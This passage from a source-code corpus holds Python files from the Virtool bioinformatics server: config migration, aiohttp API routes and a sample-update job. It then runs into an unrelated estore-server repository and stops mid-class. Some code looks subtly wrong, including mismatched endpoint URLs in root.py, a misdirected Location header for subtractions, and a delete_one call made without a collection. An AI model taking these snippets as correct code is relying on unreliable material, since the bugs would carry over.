import virtool.resources
import virtool.settings.schema
import virtool.utils
logger = logging.getLogger(__name__)
PATH = os.path.join(sys.path[0], "config.json")
LEGACY_PATH = os.path.join(sys.path[0], "settings.json")
SCHEMA = {
# HTTP Server
"host": {
"type": "string",
"default": "localhost"
},
"port": {
"type": "integer",
"coerce": int,
"default": 9950
},
# File paths
"data_path": {
"type": "string",
"default": "data"
},
"watch_path": {
"type": "string",
"default": "watch"
},
# Host resource limits
"proc": {
"type": "integer",
"coerce": int,
"default": 8
},
"mem": {
"type": "integer",
"coerce": int,
"default": 16
},
# Job Limits
"lg_proc": {
"type": "integer",
"coerce": int,
"default": 8
},
"lg_mem": {
"type": "integer",
"coerce": int,
"default": 16
},
"sm_proc": {
"type": "integer",
"coerce": int,
"default": 2
},
"sm_mem": {
"type": "integer",
"coerce": int,
"default": 4
},
# MongoDB
"db_connection_string": {
"type": "string",
"default": ""
},
"db_name": {
"type": "string",
"default": ""
},
# Proxy
"proxy": {
"type": "string",
"default": ""
},
"force_setup": {
"type": "boolean",
"coerce": virtool.utils.to_bool,
"default": False
},
"force_version": {
"type": "string",
"default": ""
}
}
JOB_LIMIT_KEYS = (
"lg_proc",
"lg_mem",
"sm_proc",
"sm_mem"
)
LEGACY_SM_JOB_LIMIT_KEYS = (
"build_index",
"create_sample",
"create_subtraction",
)
LEGACY_LG_JOB_LIMIT_KEYS = (
"pathoscope_bowtie",
"nuvs"
)
RESOURCE_TYPES = (
"proc",
"mem"
)
def coerce(key, value):
try:
func = SCHEMA[key]["coerce"]
except KeyError:
return value
return func(value)
def file_exists():
for filename in ["config.json", "settings.json"]:
path = os.path.join(sys.path[0], filename)
if os.path.exists(path):
return True
return False
def get_defaults():
return {key: SCHEMA[key]["default"] for key in SCHEMA}
def get_from_args():
parser = argparse.ArgumentParser()
parser.add_argument(
"-H", "--host",
dest="host",
default=None,
help="the hostname the HTTP server should listen on"
)
parser.add_argument(
"-p", "--port",
dest="port",
default=None,
help="the port the HTTP server should listen on"
)
parser.add_argument(
"-d", "--data-path",
dest="data_path",
default=None,
help="the location to read and write data files to",
metavar="PATH"
)
parser.add_argument(
"-w", "--watch-path",
dest="watch_path",
default=None,
help="a location to continually retrieve sequencing files from",
metavar="PATH"
)
parser.add_argument(
"--proc",
dest="proc",
default=None,
help="the processor limit for this Virtool and its subprocesses"
)
parser.add_argument(
"--mem",
dest="mem",
default=None,
help="the memory limit (GB) for this Virtool and its subprocesses"
)
parser.add_argument(
"--db",
dest="db_connection_string",
default=None,
help="the MongoDB connection string"
)
parser.add_argument(
"--db-name",
dest="db_name",
default=None,
help="the MongoDB database name"
)
parser.add_argument(
"--lg-proc",
dest="lg_proc",
default=None,
help="processor limit for large jobs",
metavar="PROC"
)
parser.add_argument(
"--lg-mem",
dest="lg_mem",
default=None,
help="memory limit for large jobs",
metavar="MEM"
)
parser.add_argument(
"--sm-proc",
dest="sm_proc",
default=None,
help="processor limit for small jobs",
metavar="PROC"
)
parser.add_argument(
"--sm-mem",
dest="sm_mem",
default=None,
help="memory limit for small jobs",
metavar="MEM"
)
parser.add_argument(
"--no-client",
action="store_true",
default=False,
dest="no_client",
help="run without serving client files"
)
parser.add_argument(
"--no-db-checks",
action="store_true",
default=False,
dest="no_db_checks",
help="disable validating and repairing database on start"
)
parser.add_argument(
"--no-file-manager",
action="store_true",
default=False,
dest="no_file_manager",
help="disable the file manager"
)
parser.add_argument(
"--no-job-manager",
action="store_true",
default=False,
dest="no_job_manager",
help="disable the job manager"
)
parser.add_argument(
"--no-refreshing",
action="store_true",
default=False,
dest="no_refreshing",
help="disable automatic checking for reference, HMM, and software releases"
)
parser.add_argument(
"--no-sentry",
action="store_true",
default=False,
dest="no_sentry",
help="disable automatic error reporting"
)
parser.add_argument(
"--no-setup",
action="store_true",
default=False,
dest="no_setup",
help="disable setup on server start"
)
parser.add_argument(
"--force-setup",
action="store_true",
default=False,
dest="force_setup",
help="force the server to start in setup mode"
)
parser.add_argument(
"--force-version",
dest="force_version",
const="v0.0.0",
help="make the server think it is the passed VERSION (default=v0.0.0)",
metavar="VERSION",
nargs="?"
)
parser.add_argument(
"--dev",
action="store_true",
default=False,
dest="dev",
help="run in dev mode"
)
parser.add_argument(
"-v", "--verbose",
action="store_true",
dest="verbose",
default=False,
help="log debug messages"
)
args = vars(parser.parse_args())
return {key: value for key, value in args.items() if value is not None}
def get_from_env() -> dict:
settings = dict()
for key in SCHEMA:
name = "VT_" + key.upper()
try:
settings[key] = os.environ[name]
except KeyError:
pass
return settings
def load_from_file() -> dict:
try:
with open(PATH, "r") as f:
return json.load(f)
except IOError:
return dict()
def migrate():
"""
Migrates old settings style to that introduced in `v3.3.0`.
- moves database-stored settings that are still in `settings.json` to `settings` database collection.
- changes name of config file from `settings.json` to `config.json`
- writes only non-default config values to `config.json`
"""
# Load the legacy `settings.json` file. Return immediately if it is not found.
try:
with open(LEGACY_PATH, "r") as f:
config = json.load(f)
except IOError:
return None
# Convert database settings to a single connection string.
convert_db(config)
db = pymongo.MongoClient(config["db_connection_string"])[config["db_name"]]
# Move settings that should be in database to database.
v = cerberus.Validator(virtool.settings.schema.SCHEMA, purge_unknown=True)
v.validate(config)
db.settings.update_one({"_id": "settings"}, {
"$set": v.document
}, upsert=True)
# Rewrite settings file without DB-stored settings.
v = cerberus.Validator(schema=SCHEMA, purge_unknown=True)
v.validate(config)
convert_http(config)
convert_job_limits(config)
convert_proxy(config)
remove_defaults(config)
config = dict(v.document)
remove_defaults(config)
virtool.config.write_to_file(config)
os.remove(LEGACY_PATH)
def convert_db(config: dict):
"""
Convert legacy database settings to a single connection string keyed by `db`. Remove all legacy database settings.
This function updates `settings in-place.
:param config: legacy settings
"""
db_host = config.pop("db_host")
db_port = config.pop("db_port")
db_name = config["db_name"]
auth_string = ""
ssl_string = ""
username = config.pop("db_username")
password = config.pop("db_password")
use_auth = config.pop("db_use_auth")
use_ssl = config.pop("db_use_ssl")
if use_auth and username and password:
username = urllib.parse.quote_plus(username)
password = urllib.parse.quote_plus(password)
auth_string = f"{username}:{password}@"
# Only use SSL if enabled and auth is configured.
if use_ssl:
ssl_string += "?ssl=true"
config["db_connection_string"] = f"mongodb://{auth_string}{db_host}:{db_port}/{db_name}{ssl_string}"
config["db_name"] = config["db_name"]
def convert_http(config: dict):
config["host"] = config.pop("server_host", "localhost")
config["port"] = config.pop("server_port", 9950)
def convert_job_limits(config: dict):
"""
Remove old task-specific limit settings and replace them with `lg_proc`, `lg_mem`, `sm_proc`, and `sm_mem`.
This function updates `settings` in-place.
:param config: legacy settings
"""
# Combine legacy job limits to lg scheme.
for resource in RESOURCE_TYPES:
config[f"lg_{resource}"] = max(config[f"{key}_{resource}"] for key in LEGACY_LG_JOB_LIMIT_KEYS)
config[f"sm_{resource}"] = max(config[f"{key}_{resource}"] for key in LEGACY_SM_JOB_LIMIT_KEYS)
for key in [*LEGACY_LG_JOB_LIMIT_KEYS, *LEGACY_SM_JOB_LIMIT_KEYS]:
del config[f"{key}_{resource}"]
for key in list(config.keys()):
if "_inst" in key or "dummy" in key:
del config[key]
def convert_proxy(config: dict):
"""
Transform proxy settings into a single connection string keyed by `proxy` and remove the old proxy settings keys.
This function updates `settings` in-place.
:param config: legacy settings
"""
address = config.pop("proxy_address")
enable = config.pop("proxy_enable")
password = config.pop("proxy_password")
trust = config.pop("proxy_trust")
username = config.pop("proxy_username")
if trust or not enable or not address:
config["proxy"] = ""
elif username and password:
prefix, suffix = address.split("//")
config["proxy"] = f"{prefix}//{username}:{password}@{suffix}"
else:
config["proxy"] = address
def remove_defaults(config: dict):
"""
Remove all config pairs where the value matches the default settings. This keeps the config file minimal.
This function modifies the `config` in-place.
:param config: config dict
"""
defaults = get_defaults()
for key in defaults:
if key in config and defaults[key] == config[key]:
config.pop(key, None)
def resolve() -> dict:
"""
Calculates and returns all non-database-stored settings based on command line options, `settings.json` content,
and `ENV`.
:return:
"""
migrate()
from_file = load_from_file()
from_args = get_from_args()
from_env = get_from_env()
from_defaults = get_defaults()
resolved = {**from_defaults, **from_env, **from_file, **from_args}
coerced = {key: coerce(key, value) for key, value in resolved.items()}
validate_limits(coerced)
return coerced
def should_do_setup(config):
if config["force_setup"]:
return True
if config["no_setup"]:
return False
return not file_exists()
def validate_limits(config):
cpu_count = psutil.cpu_count()
mem_total = psutil.virtual_memory().total
proc = int(config["proc"])
mem = int(config["mem"])
fatal = False
if proc > cpu_count:
fatal = True
logger.fatal(f"Configured proc limit ({proc}) exceeds host CPU count ({cpu_count})")
in_bytes = mem * 1024 * 1024 * 1024
if in_bytes > mem_total:
fatal = True
logger.fatal(f"Configured mem limit ({in_bytes}) exceeds host memory ({mem_total})")
for job_limit_key in JOB_LIMIT_KEYS:
resource_key = job_limit_key.split("_")[1]
job_limit = int(config[job_limit_key])
host_limit = int(config[resource_key])
if job_limit > host_limit:
fatal = True
logger.fatal(
f"Configured {job_limit_key} ({job_limit}) exceeds instance {resource_key} limit ({host_limit})"
)
if fatal:
sys.exit(1)
return cpu_count, mem_total
def write_to_file(data):
with open(PATH, "w") as f:
json_string = json.dumps(data, indent=4, sort_keys=True)
f.write(json_string)
```
#### File: virtool/groups/api.py
```python
import pymongo.errors
import virtool.groups.db
import virtool.users.db
import virtool.http.routes
import virtool.users.utils
import virtool.utils
import virtool.validators
from virtool.api import bad_request, json_response, no_content, not_found
routes = virtool.http.routes.Routes()
@routes.get("/api/groups")
async def find(req):
"""
Get a list of all existing group documents.
"""
cursor = req.app["db"].groups.find()
return json_response([virtool.utils.base_processor(d) async for d in cursor])
@routes.post("/api/groups", admin=True, schema={
"group_id": {
"type": "string",
"coerce": virtool.validators.strip,
"empty": False,
"required": True
}
})
async def create(req):
"""
Adds a new user group.
"""
db, data = req.app["db"], req["data"]
document = {
"_id": data["group_id"].lower(),
"permissions": virtool.users.utils.generate_base_permissions()
}
try:
await db.groups.insert_one(document)
except pymongo.errors.DuplicateKeyError:
return bad_request("Group already exists")
headers = {
"Location": "/api/groups/" + data["group_id"]
}
return json_response(virtool.utils.base_processor(document), status=201, headers=headers)
@routes.get("/api/groups/{group_id}")
async def get(req):
"""
Gets a complete group document.
"""
document = await req.app["db"].groups.find_one(req.match_info["group_id"])
if document:
return json_response(virtool.utils.base_processor(document))
return not_found()
@routes.patch("/api/groups/{group_id}", admin=True, schema={
"permissions": {
"type": "dict",
"default": {},
"validator": virtool.validators.is_permission_dict
}
})
async def update_permissions(req):
"""
Updates the permissions of a given group.
"""
db = req.app["db"]
data = req["data"]
group_id = req.match_info["group_id"]
old_document = await db.groups.find_one({"_id": group_id}, ["permissions"])
if not old_document:
return not_found()
old_document["permissions"].update(data["permissions"])
# Get the current permissions dict for the passed group id.
document = await db.groups.find_one_and_update({"_id": group_id}, {
"$set": {
"permissions": old_document["permissions"]
}
})
await virtool.groups.db.update_member_users(db, group_id)
return json_response(virtool.utils.base_processor(document))
@routes.delete("/api/groups/{group_id}", admin=True)
async def remove(req):
"""
Remove a group.
"""
db = req.app["db"]
group_id = req.match_info["group_id"]
delete_result = await db.groups.delete_one({"_id": group_id})
if not delete_result.deleted_count:
return not_found()
await virtool.groups.db.update_member_users(db, group_id, remove=True)
return no_content()
```
#### File: virtool/hmm/api.py
```python
import os
import aiohttp
import aiojobs.aiohttp
import virtool.db.utils
import virtool.errors
import virtool.github
import virtool.hmm.db
import virtool.http.routes
import virtool.processes.db
import virtool.utils
from virtool.api import bad_gateway, bad_request, compose_regex_query, conflict, json_response, no_content, \
not_found, paginate
routes = virtool.http.routes.Routes()
@routes.get("/api/hmms")
async def find(req):
"""
Find HMM annotation documents.
"""
db = req.app["db"]
term = req.query.get("find", None)
db_query = dict()
if term:
db_query.update(compose_regex_query(term, ["names"]))
data = await paginate(
db.hmm,
db_query,
req.query,
sort="cluster",
projection=virtool.hmm.db.PROJECTION,
base_query={"hidden": False}
)
data["status"] = await virtool.hmm.db.get_status(db)
return json_response(data)
@routes.get("/api/hmms/status")
async def get_status(req):
db = req.app["db"]
status = await virtool.hmm.db.get_status(db)
return json_response(status)
@routes.get("/api/hmms/status/release")
async def get_release(req):
try:
release = await virtool.hmm.db.fetch_and_update_release(req.app)
except virtool.errors.GitHubError as err:
if "404" in str(err):
return bad_gateway("GitHub repository does not exist")
raise
except aiohttp.ClientConnectorError:
return bad_gateway("Could not reach GitHub")
if release is None:
return not_found("Release not found")
return json_response(release)
@routes.get("/api/hmms/status/updates")
async def list_updates(req):
"""
List all updates applied to the HMM collection.
"""
db = req.app["db"]
updates = await virtool.db.utils.get_one_field(db.status, "updates", "hmm") or list()
updates.reverse()
return json_response(updates)
@routes.post("/api/hmms/status/updates", permission="modify_hmm")
async def install(req):
"""
Install the latest official HMM database from GitHub.
"""
db = req.app["db"]
user_id = req["client"].user_id
if await db.status.count({"_id": "hmm", "updates.ready": False}):
return conflict("Install already in progress")
process = await virtool.processes.db.register(
db,
"install_hmms"
)
document = await db.status.find_one_and_update({"_id": "hmm"}, {
"$set": {
"process": {
"id": process["id"]
}
}
})
release = document.get("release", None)
if release is None:
return bad_request("Target release does not exist")
update = virtool.github.create_update_subdocument(release, False, user_id)
await db.status.update_one({"_id": "hmm"}, {
"$push": {
"updates": update
}
})
await aiojobs.aiohttp.spawn(req, virtool.hmm.db.install(
req.app,
process["id"],
release,
user_id
))
return json_response(update)
@routes.get("/api/hmms/{hmm_id}")
async def get(req):
"""
Get a complete individual HMM annotation document.
"""
document = await req.app["db"].hmm.find_one({"_id": req.match_info["hmm_id"]})
if document is None:
return not_found()
return json_response(virtool.utils.base_processor(document))
@routes.delete("/api/hmms", permission="modify_hmm")
async def purge(req):
"""
Delete all unreferenced HMMs and hide the rest.
"""
db = req.app["db"]
await virtool.hmm.db.purge(db, req.app["settings"])
hmm_path = os.path.join(req.app["settings"]["data_path"], "hmm/profiles.hmm")
try:
await req.app["run_in_thread"](virtool.utils.rm, hmm_path)
except FileNotFoundError:
pass
await db.status.find_one_and_update({"_id": "hmm"}, {
"$set": {
"installed": None,
"process": None,
"updates": list()
}
})
await virtool.hmm.db.fetch_and_update_release(req.app)
return no_content()
```
#### File: virtool/http/root.py
```python
import virtool.http.routes
from virtool.api import json_response
routes = virtool.http.routes.Routes()
@routes.get("/api")
async def get(req):
"""
Returns a generic message. Used during testing for acquiring a ``session_id``.
"""
return json_response({
"endpoints": {
"account": {
"url": "/api/account",
"doc": "https://www.virtool.ca/docs/api/account.html"
},
"analyses": {
"url": "/api/account",
"doc": "https://www.virtool.ca/docs/api/analyses.html"
},
"genbank": {
"url": "/api/jobs",
"doc": "https://www.virtool.ca/docs/api/genbank.html"
},
"groups": {
"url": "/api/jobs",
"doc": "https://www.virtool.ca/docs/api/groups.html"
},
"hmm": {
"url": "/api/jobs",
"doc": "https://www.virtool.ca/docs/api/hmm.html"
},
"history": {
"url": "/api/jobs",
"doc": "https://www.virtool.ca/docs/api/history.html"
},
"indexes": {
"url": "/api/jobs",
"doc": "https://www.virtool.ca/docs/api/indexes.html"
},
"jobs": {
"url": "/api/jobs",
"doc": "https://www.virtool.ca/docs/api/jobs.html"
},
"otus": {
"url": "/api/otus",
"doc": "https://www.virtool.ca/docs/api/otus.html"
},
"processes": {
"url": "/api/otus",
"doc": "https://www.virtool.ca/docs/api/processes.html"
},
"references": {
"url": "/api/references",
"doc": "https://www.virtool.ca/docs/api/references.html"
},
"samples": {
"url": "/api/samples",
"doc": "https://www.virtool.ca/docs/api/samples.html"
},
"settings": {
"url": "/api/samples",
"doc": "https://www.virtool.ca/docs/api/settings.html"
},
"subtraction": {
"url": "/api/samples",
"doc": "https://www.virtool.ca/docs/api/subtraction.html"
},
"users": {
"url": "/api/samples",
"doc": "https://www.virtool.ca/docs/api/users.html"
}
},
"version": req.app["version"]
})
```
#### File: virtool/indexes/api.py
```python
import virtool.history.db
import virtool.indexes.db
import virtool.jobs.db
import virtool.references.db
import virtool.db.utils
import virtool.history.utils
import virtool.http.routes
import virtool.jobs.build_index
import virtool.utils
from virtool.api import bad_request, compose_regex_query, conflict, insufficient_rights, json_response, \
not_found, paginate
routes = virtool.http.routes.Routes()
@routes.get("/api/indexes")
async def find(req):
"""
Return a list of indexes.
"""
db = req.app["db"]
ready = req.query.get("ready", False)
if not ready:
data = await virtool.indexes.db.find(db, req.query)
return json_response(data)
pipeline = [
{
"$match": {
"ready": True
}
},
{
"$sort": {
"version": -1
}
},
{
"$group": {
"_id": "$reference.id",
"index": {
"$first": "$_id"
},
"version": {
"$first": "$version"
}
}
}
]
ready_indexes = list()
async for agg in db.indexes.aggregate(pipeline):
reference_name = await virtool.db.utils.get_one_field(db.references, "name", agg["_id"])
ready_indexes.append({
"id": agg["index"],
"version": agg["version"],
"reference": {
"id": agg["_id"],
"name": reference_name
}
})
return json_response(ready_indexes)
@routes.get("/api/indexes/{index_id}")
async def get(req):
"""
Get the complete document for a given index.
"""
db = req.app["db"]
index_id = req.match_info["index_id"]
document = await db.indexes.find_one(index_id)
if not document:
return not_found()
document = virtool.utils.base_processor(document)
document["contributors"] = await virtool.indexes.db.get_contributors(db, index_id)
document["otus"] = await virtool.indexes.db.get_otus(db, index_id)
document["change_count"] = sum(v["change_count"] for v in document["otus"])
return json_response(document)
@routes.post("/api/refs/{ref_id}/indexes")
async def create(req):
"""
Starts a job to rebuild the otus Bowtie2 index on disk. Does a check to make sure there are no unverified
otus in the collection and updates otu history to show the version and id of the new index.
"""
db = req.app["db"]
ref_id = req.match_info["ref_id"]
reference = await db.references.find_one(ref_id, ["groups", "users"])
if reference is None:
return not_found()
if not await virtool.references.db.check_right(req, reference, "build"):
return insufficient_rights()
if await db.indexes.count({"reference.id": ref_id, "ready": False}):
return conflict("Index build already in progress")
if await db.otus.count({"reference.id": ref_id, "verified": False}):
return bad_request("There are unverified OTUs")
if not await db.history.count({"reference.id": ref_id, "index.id": "unbuilt"}):
return bad_request("There are no unbuilt changes")
index_id = await virtool.db.utils.get_new_id(db.indexes)
index_version = await virtool.indexes.db.get_next_version(db, ref_id)
job_id = await virtool.db.utils.get_new_id(db.jobs)
manifest = await virtool.references.db.get_manifest(db, ref_id)
user_id = req["client"].user_id
document = {
"_id": index_id,
"version": index_version,
"created_at": virtool.utils.timestamp(),
"manifest": manifest,
"ready": False,
"has_files": True,
"job": {
"id": job_id
},
"reference": {
"id": ref_id
},
"user": {
"id": user_id
}
}
await db.indexes.insert_one(document)
await db.history.update_many({"index.id": "unbuilt", "reference.id": ref_id}, {
"$set": {
"index": {
"id": index_id,
"version": index_version
}
}
})
# A dict of task_args for the rebuild job.
task_args = {
"ref_id": ref_id,
"user_id": user_id,
"index_id": index_id,
"index_version": index_version,
"manifest": manifest
}
# Create job document.
job = await virtool.jobs.db.create(
db,
req.app["settings"],
"build_index",
task_args,
user_id,
job_id=job_id
)
await req.app["jobs"].enqueue(job["_id"])
headers = {
"Location": "/api/indexes/" + index_id
}
return json_response(virtool.utils.base_processor(document), status=201, headers=headers)
@routes.get("/api/indexes/{index_id}/history")
async def find_history(req):
"""
Find history changes for a specific index.
"""
db = req.app["db"]
index_id = req.match_info["index_id"]
if not await db.indexes.count({"_id": index_id}):
return not_found()
term = req.query.get("term", None)
db_query = {
"index.id": index_id
}
if term:
db_query.update(compose_regex_query(term, ["otu.name", "user.id"]))
data = await paginate(
db.history,
db_query,
req.query,
sort=[("otu.name", 1), ("otu.version", -1)],
projection=virtool.history.db.LIST_PROJECTION,
reverse=True
)
return json_response(data)
```
#### File: virtool/jobs/run.py
```python
def run(job_id, db_connection_string, db_name, redis=None):
pass
```
#### File: virtool/jobs/update_sample.py
```python
import os
import virtool.caches.db
import virtool.files.db
import virtool.samples.db
import virtool.jobs.fastqc
import virtool.jobs.job
import virtool.jobs.utils
import virtool.samples.utils
import virtool.utils
class Job(virtool.jobs.job.Job):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
#: The ordered list of :ref:`stage methods <stage-methods>` that are called by the job.
self._stage_list = [
self.copy_files,
self.fastqc,
self.parse_fastqc,
self.create_cache,
self.replace_old
]
def check_db(self):
self.params = virtool.jobs.utils.get_sample_params(
self.db,
self.settings,
self.task_args
)
def copy_files(self):
"""
Copy the replacement files from the files directory to the sample directory.
The files are named replacement_reads_<suffix>.fq.gz. They will be compressed if necessary.
"""
files = self.params["files"]
sample_id = self.params["sample_id"]
paths = [os.path.join(self.settings["data_path"], "files", file["replacement"]["id"]) for file in files]
sizes = virtool.jobs.utils.copy_files_to_sample(
paths,
self.params["sample_path"],
self.proc
)
raw = list()
for index, file in enumerate(files):
name = f"reads_{index + 1}.fq.gz"
raw.append({
"name": name,
"download_url": f"/download/samples/{sample_id}/{name}",
"size": sizes[index],
"from": file
})
self.intermediate["raw"] = raw
def fastqc(self):
"""
Runs FastQC on the replacement read files.
"""
fastq_path = self.params["fastqc_path"]
try:
virtool.utils.rm(fastq_path, recursive=True)
except FileNotFoundError:
pass
os.mkdir(fastq_path)
paths = virtool.samples.utils.join_read_paths(
self.params["sample_path"],
self.params["paired"]
)
virtool.jobs.fastqc.run_fastqc(
self.run_subprocess,
self.proc,
paths,
fastq_path
)
def parse_fastqc(self):
"""
Capture the desired data from the FastQC output. The data is added to the samples database
in the main run() method
"""
self.intermediate["qc"] = virtool.jobs.fastqc.parse_fastqc(
self.params["fastqc_path"],
self.params["sample_path"],
prefix="replacement_fastqc_"
)
def create_cache(self):
"""
Create a cache from the old sample files.
These files constitute a valid cache because they were trimmed in the original CreateSample job.
"""
sample_id = self.params["sample_id"]
self.intermediate["cache_id"] = virtool.caches.db.create(
self.db,
sample_id,
virtool.samples.utils.LEGACY_TRIM_PARAMETERS,
self.params["paired"],
legacy=True
)
cache_id = self.intermediate["cache_id"]
self.dispatch("caches", "insert", [cache_id])
files = list()
cache_path = virtool.jobs.utils.join_cache_path(self.settings, cache_id)
os.makedirs(cache_path)
for index, file in enumerate(self.params["files"]):
path = os.path.join(self.params["sample_path"], file["name"])
name = f"reads_{index + 1}.fq.gz"
target = os.path.join(cache_path, name)
virtool.jobs.utils.copy_or_compress(path, target, self.proc)
stats = virtool.utils.file_stats(target)
files.append({
"name": name,
"size": stats["size"]
})
self.db.caches.update_one({"_id": cache_id}, {
"$set": {
"ready": True,
"files": files,
"quality": self.params["document"]["quality"]
}
})
self.dispatch("caches", "update", [cache_id])
analysis_query = {"sample.id": sample_id}
self.db.analyses.update_many(analysis_query, {
"$set": {
"cache": {
"id": cache_id
}
}
})
analysis_ids = self.db.analyses.distinct("_id", analysis_query)
self.dispatch("analyses", "update", analysis_ids)
def replace_old(self):
sample_id = self.params["sample_id"]
files = list()
# Prepare new list for `files` field in sample document.
for index, file in enumerate(self.params["files"]):
name = f"reads_{index + 1}.fq.gz"
path = os.path.join(self.params["sample_path"], name)
stats = virtool.utils.file_stats(path)
files.append({
"name": name,
"download_url": f"/download/samples/{sample_id}/{name}",
"size": stats["size"],
"from": file["replacement"],
"raw": True
})
# Set new files as primary files for sample. Add prune flag, which will cause old files to be automatically
# removed when they are no longer in use by running analyses.
self.db.samples.update_one({"_id": self.params["sample_id"]}, {
"$set": {
"files": files,
"prune": True,
"quality": self.intermediate["qc"]
},
"$unset": {
"update_job": ""
}
})
self.dispatch("samples", "update", [self.params["sample_id"]])
def cleanup(self):
# Remove cache
cache_id = self.intermediate.get("cache_id")
if cache_id:
self.db.delete_one({"_id": cache_id})
cache_path = virtool.jobs.utils.join_cache_path(self.settings, cache_id)
self.dispatch("caches", "delete", [cache_id])
# Remove cache directory.
try:
virtool.utils.rm(cache_path, recursive=True)
except FileNotFoundError:
pass
sample_id = self.params["sample_id"]
# Undo analysis cache field addition.
analysis_query = {"sample.id": sample_id}
self.db.analyses.update_many(analysis_query, {
"$unset": {
"cache": ""
}
})
analysis_ids = self.db.analyses.distinct("_id", analysis_query)
self.dispatch("analyses", "update", analysis_ids)
# Undo sample document changes.
self.db.samples.update_one({"_id": sample_id}, {
"$set": {
# Use old files and quality fields.
"files": self.params["files"],
"quality": self.params["document"]["quality"]
},
"$unset": {
"prune": "",
"update_job": ""
}
})
self.dispatch("samples", "update", [sample_id])
# Remove sample files.
paths = virtool.samples.utils.join_read_paths(self.params["sample_path"], paired=True)
for path in paths:
try:
virtool.utils.rm(path)
except FileNotFoundError:
pass
```
#### File: virtool/processes/api.py
```python
import virtool.http.routes
import virtool.utils
from virtool.api import json_response, not_found
routes = virtool.http.routes.Routes()
@routes.get("/api/processes")
async def find(req):
db = req.app["db"]
documents = [virtool.utils.base_processor(d) async for d in db.processes.find()]
return json_response(documents)
@routes.get("/api/processes/{process_id}")
async def get(req):
db = req.app["db"]
process_id = req.match_info["process_id"]
document = await db.processes.find_one(process_id)
if not document:
return not_found()
return json_response(virtool.utils.base_processor(document))
```
#### File: virtool/settings/db.py
```python
import logging
logger = logging.getLogger(__name__)
PROJECTION = {
"_id": False
}
CONFIG_PROJECTION = (
"data_path",
"watch_path",
"proc",
"mem",
"lg_proc",
"lg_mem",
"sm_proc",
"sm_mem"
)
async def get(db):
settings = await db.settings.find_one("settings", projection=PROJECTION)
if settings:
return settings
return dict()
async def update(db, updates):
return await db.settings.find_one_and_update({"_id": "settings"}, {
"$set": updates
})
```
#### File: virtool/subtractions/api.py
```python
import shutil
import virtool.jobs.db
import virtool.subtractions.db
import virtool.db.utils
import virtool.http.routes
import virtool.samples.utils
import virtool.subtractions.utils
import virtool.utils
import virtool.validators
from virtool.api import bad_request, compose_regex_query, conflict, json_response, no_content, not_found, paginate
routes = virtool.http.routes.Routes()
@routes.get("/api/subtractions")
async def find(req):
db = req.app["db"]
ids = req.query.get("ids", False)
if ids:
return json_response(await db.subtraction.distinct("_id"))
host_count = await db.subtraction.count({"is_host": True})
ready_host_count = await db.subtraction.count({"is_host": True, "ready": True})
term = req.query.get("find", None)
db_query = dict()
if term:
db_query.update(compose_regex_query(term, ["_id"]))
data = await paginate(
db.subtraction,
db_query,
req.query,
sort="_id",
projection=virtool.subtractions.db.PROJECTION
)
data.update({
"host_count": host_count,
"ready_host_count": ready_host_count
})
return json_response(data)
@routes.get("/api/subtractions/{subtraction_id}")
async def get(req):
"""
Get a complete host document.
"""
db = req.app["db"]
subtraction_id = req.match_info["subtraction_id"]
document = await db.subtraction.find_one(subtraction_id)
if not document:
return not_found()
document["linked_samples"] = await virtool.subtractions.db.get_linked_samples(db, subtraction_id)
return json_response(virtool.utils.base_processor(document))
@routes.post("/api/subtractions", permission="modify_subtraction", schema={
"subtraction_id": {
"type": "string",
"coerce": virtool.validators.strip,
"empty": False,
"required": True
},
"nickname": {
"type": "string",
"coerce": virtool.validators.strip,
"default": ""
},
"file_id": {
"type": "string",
"required": True
}
})
async def create(req):
"""
Add a new subtraction. Starts an :class:`.CreateSubtraction` job process.
"""
db = req.app["db"]
data = req["data"]
subtraction_id = data["subtraction_id"]
if await db.subtraction.count({"_id": subtraction_id}):
return bad_request("Subtraction name already exists")
file_id = data["file_id"]
file = await db.files.find_one(file_id, ["name"])
if file is None:
return bad_request("File does not exist")
job_id = await virtool.db.utils.get_new_id(db.jobs)
user_id = req["client"].user_id
document = {
"_id": data["subtraction_id"],
"nickname": data["nickname"],
"ready": False,
"is_host": True,
"file": {
"id": file_id,
"name": file["name"]
},
"user": {
"id": user_id
},
"job": {
"id": job_id
}
}
await db.subtraction.insert_one(document)
task_args = {
"subtraction_id": subtraction_id,
"file_id": file_id
}
await virtool.jobs.db.create(
db,
req.app["settings"],
"create_subtraction",
task_args,
user_id,
job_id=job_id
)
await req.app["jobs"].enqueue(job_id)
headers = {
"Location": f"/api/account/keys/{subtraction_id}"
}
return json_response(virtool.utils.base_processor(document), headers=headers, status=201)
@routes.patch("/api/subtractions/{subtraction_id}", permission="modify_subtraction", schema={
"nickname": {
"type": "string",
"coerce": virtool.validators.strip,
"required": True
}
})
async def edit(req):
"""
Updates the nickname for an existing subtraction.
"""
db = req.app["db"]
data = req["data"]
subtraction_id = req.match_info["subtraction_id"]
document = await db.subtraction.find_one_and_update({"_id": subtraction_id}, {
"$set": {
"nickname": data["nickname"]
}
})
if document is None:
return not_found()
document["linked_samples"] = await virtool.subtractions.db.get_linked_samples(db, subtraction_id)
return json_response(virtool.utils.base_processor(document))
@routes.delete("/api/subtractions/{subtraction_id}", permission="modify_subtraction")
async def remove(req):
db = req.app["db"]
settings = req.app["settings"]
subtraction_id = req.match_info["subtraction_id"]
if await db.samples.count({"subtraction.id": subtraction_id}):
return conflict("Has linked samples")
delete_result = await db.subtraction.delete_one({"_id": subtraction_id})
if delete_result.deleted_count == 0:
return not_found()
index_path = virtool.subtractions.utils.calculate_index_path(settings, subtraction_id)
await req.app["run_in_thread"](shutil.rmtree, index_path, True)
return no_content()
``` |
{
"source": "Jin-Xu/estore-server",
"score": 2
} |
#### File: estore/server/builtins.py
```python
import sys
async def length(obj):
return await getattr(obj, '__length__')()
def register():
sys.modules['builtins'].length = length
```
#### File: estore/server/view.py
```python
import json
import uuid
import logging
import functools
import asyncio
import aiohttp.web
import aiohttp_session
import estore.server.store
logger = logging.getLogger(__name__)
def process_headers(headers):
return dict(map(
lambda x: (x[0][5:], x[1]),
filter(lambda x: x[0].startswith('X-ES-'), headers.items())))
def init(app, store):
event = Event(store)
app.add_post('/{stream}/{name}', event.add)
app.add_get('/ws', event.websocket)
app.add_get('/ws/{start}', event.websocket, name='with_start')
app.add_get('/stream/{stream_id}', event.stream)
async def get_event_from_request(request):
print(request.headers)
headers = process_headers(request.headers)
name = request.match_info['name']
stream = request.match_info['stream']
version = headers['Version']
del headers['Version']
body = await request.post()
return estore.base.Event(name, uuid.UUID(stream), version, dict(body), headers)
def get_stream_id_from_request(request):
return uuid.UUID(request.match_info['stream_id'])
class Event(object):
